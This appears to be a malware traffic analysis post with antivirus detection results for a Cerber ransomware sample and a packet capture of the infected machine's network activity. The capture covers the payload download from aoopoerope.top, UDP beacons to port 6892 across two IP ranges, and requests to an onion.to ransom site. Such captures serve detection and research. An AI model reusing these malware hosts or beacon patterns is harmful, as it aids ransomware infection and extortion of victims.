Cerber Ransomware Trojan Malware read.php aoopoerope.top Traffic Analysis Full PCAP File Download

Attachment: 1 pcap fdat (date added: January 16, 2017 7:45 am; added by: admin; file size: 151 KB)
SHA256: edf9fd11f47c914459f673a5c635801208c14217a6d714f6b60b7ce4b62e54d8
File name: read.php
Detection ratio: 10 / 57
Analysis date: 2017-01-16 07:37:11 UTC
AhnLab-V3 Trojan/Win32.Cerber.C1748597 20170116
Avast Win32:Malware-gen 20170116
Avira (no cloud) TR/Crypt.Xpack.amsqc 20170116
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9985 20170116
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
ESET-NOD32 a variant of Win32/Injector.DJVO 20170116
Invincea worm.win32.kasidet.f 20170111
Kaspersky UDS:DangerousObject.Multi.Generic 20170116
Qihoo-360 HEUR/QVM42.0.0000.Malware.Gen 20170116
Rising Malware.Generic!YNz7NgPxwWG@1 (thunder) 20170116

 

2017-01-15 23:39:23.889013 IP 192.168.1.102.62841 > 35.161.229.79.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M=.@….}…f#..O.y.P.8..2>..P…>…GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoopoerope.top
Connection: Keep-Alive

2017-01-15 23:41:05.390291 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [P.], seq 0:276, ack 1, win 256, length 276: HTTP: GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
E..<Eq@……..f.”…..Pd……DP…+…GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
Cache-Control: max-age = 393
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 26 Dec 2016 06:01:59 GMT
If-None-Match: “e6d8ca913d5fd21:0”
User-Agent: Microsoft-CryptoAPI/10.0
Host: www.microsoft.com
2017-01-15 23:41:05.467921 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [.], ack 249, win 255, length 0
E..(Er@……..f.”…..Pd……<P….s……..
2017-01-15 23:41:23.387074 IP 192.168.1.102.55397 > 90.2.1.0.6892: UDP, length 25
E..5.8…..p…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387125 IP 192.168.1.102.55397 > 90.2.1.1.6892: UDP, length 25
E..5D……$…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387248 IP 192.168.1.102.55397 > 90.2.1.2.6892: UDP, length 25
E..5,……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387255 IP 192.168.1.102.55397 > 90.2.1.3.6892: UDP, length 25
E..5c`…..D…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387310 IP 192.168.1.102.55397 > 90.2.1.4.6892: UDP, length 25
E..5X……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387380 IP 192.168.1.102.55397 > 90.2.1.5.6892: UDP, length 25
E..5.t…../…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387436 IP 192.168.1.102.55397 > 90.2.1.6.6892: UDP, length 25
E..5………..fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387442 IP 192.168.1.102.55397 > 90.2.1.7.6892: UDP, length 25
E..50……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387537 IP 192.168.1.102.55397 > 90.2.1.8.6892: UDP, length 25
E..5b……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387543 IP 192.168.1.102.55397 > 90.2.1.9.6892: UDP, length 25
E..5-……….fZ.. .e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387608 IP 192.168.1.102.55397 > 90.2.1.10.6892: UDP, length 25
E..5E……….fZ..
.e…!..c9e537574920044695010008c

2017-01-15 23:41:23.390149 IP 192.168.1.102.55397 > 91.239.24.2.6892: UDP, length 25
E..5bM…..k…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390153 IP 192.168.1.102.55397 > 91.239.24.3.6892: UDP, length 25
E..5-……….f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390201 IP 192.168.1.102.55397 > 91.239.24.4.6892: UDP, length 25
E..5.}…..9…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390279 IP 192.168.1.102.55397 > 91.239.24.5.6892: UDP, length 25
E..5Y……….f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390329 IP 192.168.1.102.55397 > 91.239.24.6.6892: UDP, length 25
E..51……     …f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390332 IP 192.168.1.102.55397 > 91.239.24.7.6892: UDP, length 25
E..5~#………f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390381 IP 192.168.1.102.55397 > 91.239.24.8.6892: UDP, length 25
E..5,h…..J…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390456 IP 192.168.1.102.55397 > 91.239.24.9.6892: UDP, length 25
E..5c……….f[..     .e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390506 IP 192.168.1.102.55397 > 91.239.24.10.6892: UDP, length 25
E..5………..f[..
.e…!..c9e537574920044695010008c

2017-01-15 23:44:55.252080 IP 192.168.1.102.59606 > 90.2.1.12.6892: UDP, length 14
E..*1M…..Y…fZ……….7c9e5375749203e….
2017-01-15 23:44:55.252142 IP 192.168.1.102.59606 > 90.2.1.13.6892: UDP, length 14
E..*~……….fZ……….6c9e5375749203e….
2017-01-15 23:44:55.252193 IP 192.168.1.102.59606 > 90.2.1.14.6892: UDP, length 14
E..*.+…..z…fZ……….5c9e5375749203e….
2017-01-15 23:44:55.252197 IP 192.168.1.102.59606 > 90.2.1.15.6892: UDP, length 14
E..*Ys…..0…fZ……….4c9e5375749203e….
2017-01-15 23:44:55.252243 IP 192.168.1.102.59606 > 90.2.1.16.6892: UDP, length 14
E..*?……….fZ……….3c9e5375749203e….
2017-01-15 23:44:55.252330 IP 192.168.1.102.59606 > 90.2.1.17.6892: UDP, length 14
E..*p……….fZ……….2c9e5375749203e….
2017-01-15 23:44:55.252380 IP 192.168.1.102.59606 > 90.2.1.18.6892: UDP, length 14
E..*.Q…..P…fZ……….1c9e5375749203e….
2017-01-15 23:44:55.252383 IP 192.168.1.102.59606 > 90.2.1.19.6892: UDP, length 14
E..*W……….fZ……….0c9e5375749203e….
2017-01-15 23:44:55.252432 IP 192.168.1.102.59606 > 90.2.1.20.6892: UDP, length 14
E..*la…..=…fZ………./c9e5375749203e….
2017-01-15 23:44:55.252512 IP 192.168.1.102.59606 > 90.2.1.21.6892: UDP, length 14
E..*#……….fZ………..c9e5375749203e….
2017-01-15 23:44:55.252562 IP 192.168.1.102.59606 > 90.2.1.22.6892: UDP, length 14
E..*L’…..u…fZ……….-c9e5375749203e….
2017-01-15 23:44:55.252612 IP 192.168.1.102.59606 > 90.2.1.23.6892: UDP, length 14
E..*………..fZ……….,c9e5375749203e….
2017-01-15 23:44:55.252615 IP 192.168.1.102.59606 > 90.2.1.24.6892: UDP, length 14
E..*Vl………fZ……….+c9e5375749203e….
2017-01-15 23:44:55.252696 IP 192.168.1.102.59606 > 90.2.1.25.6892: UDP, length 14
E..*………..fZ……….*c9e5375749203e….
2017-01-15 23:44:55.252747 IP 192.168.1.102.59606 > 90.2.1.26.6892: UDP, length 14
E..*r”…..v…fZ……….)c9e5375749203e….
2017-01-15 23:44:55.252750 IP 192.168.1.102.59606 > 90.2.1.27.6892: UDP, length 14
E..*>……….fZ……….(c9e5375749203e….
2017-01-15 23:44:55.252797 IP 192.168.1.102.59606 > 90.2.1.28.6892: UDP, length 14
E..*………..fZ……….’c9e5375749203e….

2017-01-15 23:44:55.254495 IP 192.168.1.102.59606 > 91.239.24.0.6892: UDP, length 14
E..*G……….f[……….Uc9e5375749203e….
2017-01-15 23:44:55.254499 IP 192.168.1.102.59606 > 91.239.24.1.6892: UDP, length 14
E..*./………f[……….Tc9e5375749203e….
2017-01-15 23:44:55.254549 IP 192.168.1.102.59606 > 91.239.24.2.6892: UDP, length 14
E..*dM…..v…f[……….Sc9e5375749203e….
2017-01-15 23:44:55.254629 IP 192.168.1.102.59606 > 91.239.24.3.6892: UDP, length 14
E..*/……….f[……….Rc9e5375749203e….
2017-01-15 23:44:55.254679 IP 192.168.1.102.59606 > 91.239.24.4.6892: UDP, length 14
E..*.}…..D…f[……….Qc9e5375749203e….
2017-01-15 23:44:55.254683 IP 192.168.1.102.59606 > 91.239.24.5.6892: UDP, length 14
E..*[……….f[……….Pc9e5375749203e….
2017-01-15 23:44:55.254733 IP 192.168.1.102.59606 > 91.239.24.6.6892: UDP, length 14
E..*3……….f[……….Oc9e5375749203e….
2017-01-15 23:44:55.254810 IP 192.168.1.102.59606 > 91.239.24.7.6892: UDP, length 14
E..*.#………f[……….Nc9e5375749203e….
2017-01-15 23:44:55.254862 IP 192.168.1.102.59606 > 91.239.24.8.6892: UDP, length 14
E..*.h…..U…f[……….Mc9e5375749203e….
2017-01-15 23:44:55.254866 IP 192.168.1.102.59606 > 91.239.24.9.6892: UDP, length 14
E..*e……….f[..     …….Lc9e5375749203e….
2017-01-15 23:44:55.254916 IP 192.168.1.102.59606 > 91.239.24.10.6892: UDP, length 14

2017-01-15 23:46:39.295958 IP 192.168.1.102.63049 > 52.85.130.113.443: Flags [P.], seq 5186:5635, ack 7564, win 253, length 449
E…+.@…U3…f4U.q.I..N(….j.P…………..[e.o.zD..v…..a..m(j..Q…$.<.aN.Q}.yP5.$.3.1..Q
.]i..4n..7C….`…d..y….2″………R…[…..u@.@CZ..2.T…..1…..nH..(l..{…t&..thcIS..@…G{…n@&..=@………….%..O….0..R………..,….|…..he.5s.6….7/.-     ..6/m.\……Dl….5.*gH..o.C.7XY.#..vr.OG..v(…J1.y{p..2.S.#..R……>……….O…lT<.:Jx..]………….=..%ZT…..t..Fh..j.(……?~k.F.. .J4 ..r.q.b9}.sK.I.j#.%l…c.~..x….L…..B.5II..qm)……._f..
…2.j}<…
2017-01-15 23:46:39.651232 IP 192.168.1.102.63049 > 52.85.130.113.443: Flags [.], ack 8218, win 251, length 0
E..(+.@…V….f4U.q.I..N(….meP…[………
2017-01-15 23:46:50.493725 IP 192.168.1.102.50371 > 75.75.75.75.53: 60606+ A? download.mozilla.org. (38)
E..B.P………fKKKK…5……………..download.mozilla.org…..
2017-01-15 23:46:50.521505 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [S], seq 243451869, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4HD@……..f47…L.P………. ……………..
2017-01-15 23:46:50.523024 IP 192.168.1.102.50372 > 75.75.75.75.53: 4003+ A? bouncer-bouncer-elb.prod.mozaws.net. (53)
E..Q.Q………fKKKK…5.=……………bouncer-bouncer-elb.prod.mozaws.net…..
2017-01-15 23:46:50.547321 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [.], ack 2271199228, win 256, length 0
E..(HE@……..f47…L.P….._..P………….
2017-01-15 23:46:50.548854 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [P.], seq 0:335, ack 1, win 256, length 335: HTTP: GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
E..wHF@….A…f47…L.P….._..P…….GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=6000000-6299999
Connection: keep-alive

2017-01-15 23:46:50.567181 IP 192.168.1.102.50373 > 75.75.75.75.53: 48273+ AAAA? bouncer-bouncer-elb.prod.mozaws.net. (53)
E..Q.R………fKKKK…5.=……………bouncer-bouncer-elb.prod.mozaws.net…..
2017-01-15 23:46:50.591241 IP 192.168.1.102.50374 > 75.75.75.75.53: 36531+ AAAA? bouncer-bouncer-elb.prod.mozaws.net.localdomain. (65)
E..].S………fKKKK…5.I.]………….bouncer-bouncer-elb.prod.mozaws.net.localdomain…..
2017-01-15 23:46:50.650505 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [.], ack 419, win 255, length 0
E..(HG@……..f47…L.P…-._..P………….
2017-01-15 23:46:50.853975 IP 192.168.1.102.50375 > 75.75.75.75.53: 44713+ A? download.cdn.mozilla.net. (42)
E..F.T………fKKKK…5.2.u………….download.cdn.mozilla.net…..
2017-01-15 23:46:50.880072 IP 192.168.1.102.50376 > 75.75.75.75.53: 19427+ A? a1284.dscg.akamai.net. (39)
E..C.U………fKKKK…5./.OK…………a1284.dscg.akamai.net…..
2017-01-15 23:46:51.120513 IP 192.168.1.102.50377 > 75.75.75.75.53: 44333+ AAAA? a1284.dscg.akamai.net. (39)
E..C.V………fKKKK…5./<..-………..a1284.dscg.akamai.net…..
2017-01-15 23:46:53.787836 IP 192.168.1.102.50378 > 75.75.75.75.53: 21950+ A? tiles.services.mozilla.com. (44)
E..H.W………fKKKK…5.4vXU…………tiles.services.mozilla.com…..
2017-01-15 23:46:53.789311 IP 192.168.1.102.50379 > 75.75.75.75.53: 27066+ A? p27dokhpz2n7nvgr.onion.to. (43)
E..G.X………fKKKK…5.3..i…………p27dokhpz2n7nvgr.onion.to…..
2017-01-15 23:46:53.818089 IP 192.168.1.102.50380 > 75.75.75.75.53: 17597+ A? tiles.r53-2.services.mozilla.com. (50)
E..N.Y………fKKKK…5.:.tD…………tiles.r53-2.services.mozilla.com…..
2017-01-15 23:46:53.818625 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [S], seq 1224485300, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4<z@……..f4X.<.N..H.)……. ……………..
2017-01-15 23:46:53.843879 IP 192.168.1.102.50381 > 75.75.75.75.53: 63520+ A? location.services.mozilla.com. (47)
E..K.Z………fKKKK…5.7… ………..location.services.mozilla.com…..
2017-01-15 23:46:53.851378 IP 192.168.1.102.50382 > 75.75.75.75.53: 34479+ AAAA? tiles.r53-2.services.mozilla.com. (50)
E..N.[………fKKKK…5.:.d………….tiles.r53-2.services.mozilla.com…..
2017-01-15 23:46:53.865576 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [S], seq 3497315147, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    5@….1…f4.|=.O…t.K…… .H……………
2017-01-15 23:46:53.867029 IP 192.168.1.102.50383 > 75.75.75.75.53: 60980+ A? locprod1-elb-eu-west-1.prod.mozaws.net. (56)
E..T.\………fKKKK…5.@…4………..locprod1-elb-eu-west-1.prod.mozaws.net…..
2017-01-15 23:46:53.875338 IP 192.168.1.102.50384 > 75.75.75.75.53: 29643+ AAAA? tiles.r53-2.services.mozilla.com.localdomain. (62)
E..Z.]………fKKKK…5.Fu.s…………tiles.r53-2.services.mozilla.com.localdomain…..
2017-01-15 23:46:53.923208 IP 192.168.1.102.50385 > 75.75.75.75.53: 62983+ AAAA? locprod1-elb-eu-west-1.prod.mozaws.net. (56)
E..T.^………fKKKK…5.@……………locprod1-elb-eu-west-1.prod.mozaws.net…..
2017-01-15 23:46:53.947549 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [.], ack 2204531087, win 64240, length 0
E..(<{@……..f4X.<.N..H.)..fy.P…O………
2017-01-15 23:46:53.948324 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [P.], seq 0:208, ack 1, win 64240, length 208
E…<|@……..f4X.<.N..H.)..fy.P………………….,5,…`…..C.G..r.LCDr..”……+./…..
.       …..3.9./.5.
………….tiles.services.mozilla.com……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.027002 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [.], ack 1980024688, win 256, length 0
E..(    6@….<…f4.|=.O…t.Lv..pP…k5……..
2017-01-15 23:46:54.027136 IP 192.168.1.102.50386 > 75.75.75.75.53: 65330+ AAAA? locprod1-elb-eu-west-1.prod.mozaws.net.localdomain. (68)
E..`._………fKKKK…5.L]..2………..locprod1-elb-eu-west-1.prod.mozaws.net.localdomain…..

2017-01-15 23:46:54.245185 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [.], ack 1796123072, win 256, length 0
E..(NX@….n…f.dU..Q.Pf`..k…P….r……..
2017-01-15 23:46:54.245877 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [P.], seq 0:316, ack 1, win 256, length 316: HTTP: GET /C9E5-3757-4920-0446-96CD HTTP/1.1
E..dNY@….1…f.dU..Q.Pf`..k…P….}..GET /C9E5-3757-4920-0446-96CD HTTP/1.1
Host: p27dokhpz2n7nvgr.onion.to
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2017-01-15 23:46:54.654433 IP 192.168.1.102.63058 > 185.100.85.150.443: Flags [P.], seq 0:207, ack 1, win 256, length 207
E…N^@……..f.dU..R…SL..D..P………………4..”…..M.-…..\…8…..^..8…..+./…..
.       …..3.9./.5.
………….p27dokhpz2n7nvgr.onion.to……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.675502 IP 192.168.1.102.50393 > 75.75.75.75.53: 64425+ A? tiles-cloudfront.cdn.mozilla.net. (50)
E..N.f………fKKKK…5.:C…………..tiles-cloudfront.cdn.mozilla.net…..
2017-01-15 23:46:54.691829 IP 192.168.1.102.50394 > 75.75.75.75.53: 3950+ A? search.services.mozilla.com. (45)
E..I.g………fKKKK…5.5…n………..search.services.mozilla.com…..
2017-01-15 23:46:54.698859 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [S], seq 3527399029, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4I.@…+….f4U…W…?.u…… .)9…………..
2017-01-15 23:46:54.700308 IP 192.168.1.102.50395 > 75.75.75.75.53: 4361+ A? dcky6u1m8u6el.cloudfront.net. (46)
E..J.h………fKKKK…5.6.-.   ………..dcky6u1m8u6el
cloudfront.net…..
2017-01-15 23:46:54.716052 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [.], ack 3514, win 63687, length 0
E..(<.@……..f4X.<.N..H.,..f.HP…A0……..
2017-01-15 23:46:54.726857 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [.], ack 2078486373, win 256, length 0
E..(I.@…+….f4U…W…?.v{./eP………….
2017-01-15 23:46:54.732133 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [P.], seq 0:214, ack 1, win 256, length 214
E…I.@…+….f4U…W…?.v{./eP….e…………..g…-……L.Q’….>.2.go.!..a…..+./…..
.       …..3.9./.5.
…….%.#.. tiles-cloudfront.cdn.mozilla.net……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.733632 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [.], ack 3342, win 254, length 0
E..(    <@….6…f4.|=.O…t.Ov..}P…[‘……..
2017-01-15 23:46:54.745274 IP 192.168.1.102.63064 > 52.36.246.167.443: Flags [S], seq 3053522528, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.w@….r…f4$…X…..`…… ……………..
2017-01-15 23:46:54.751550 IP 192.168.1.102.50396 > 75.75.75.75.53: 5442+ A? search.r53-2.services.mozilla.com. (51)
E..O.i………fKKKK…5.;7..B………..search.r53-2.services.mozilla.com…..
2017-01-15 23:46:54.752640 IP 192.168.1.102.50397 > 75.75.75.75.53: 60237+ AAAA? dcky6u1m8u6el.cloudfront.net. (46)
E..J.j………fKKKK…5.65..M………..dcky6u1m8u6el

2017-01-15 23:47:54.184861 IP 192.168.1.102.60652 > 75.75.75.75.53: 60795+ A? ciscobinary.openh264.org. (42)
E..F…….r…fKKKK…5.2…{………..ciscobinary.openh264.org…..
2017-01-15 23:47:54.204808 IP 192.168.1.102.63093 > 35.161.49.209.443: Flags [.], ack 3885, win 63271, length 0
E..(s.@…o….f#.1..u…c.QM…P..’U………
2017-01-15 23:47:54.217320 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [S], seq 2406696465, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.4@…X!…f.. b.v.P.sF……. ..U…………..
2017-01-15 23:47:54.230029 IP 192.168.1.102.60653 > 75.75.75.75.53: 19381+ A? a19.dscg10.akamai.net. (39)
E..C…….t…fKKKK…5./.TK…………a19.dscg10.akamai.net…..
2017-01-15 23:47:54.250576 IP 192.168.1.102.60654 > 75.75.75.75.53: 43727+ AAAA? a19.dscg10.akamai.net. (39)
E..C…….s…fKKKK…5./.9………….a19.dscg10.akamai.net…..
2017-01-15 23:47:54.258223 IP 192.168.1.102.63091 > 50.112.150.136.443: Flags [.], ack 3656, win 253, length 0
E..(>?@…1….f2p…s..YF..4*YvP…&………
2017-01-15 23:47:54.288833 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [.], ack 1515896577, win 256, length 0
E..(.5@…X,…f.. b.v.P.sF.ZZ..P…@………
2017-01-15 23:47:54.290361 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [P.], seq 0:449, ack 1, win 256, length 449: HTTP: GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
E….6@…Vj…f.. b.v.P.sF.ZZ..P…….GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-Modified-Since: Tue, 02 Aug 2016 18:34:14 GMT
If-None-Match: ac4fcf1b56303959919767d33473cbb9
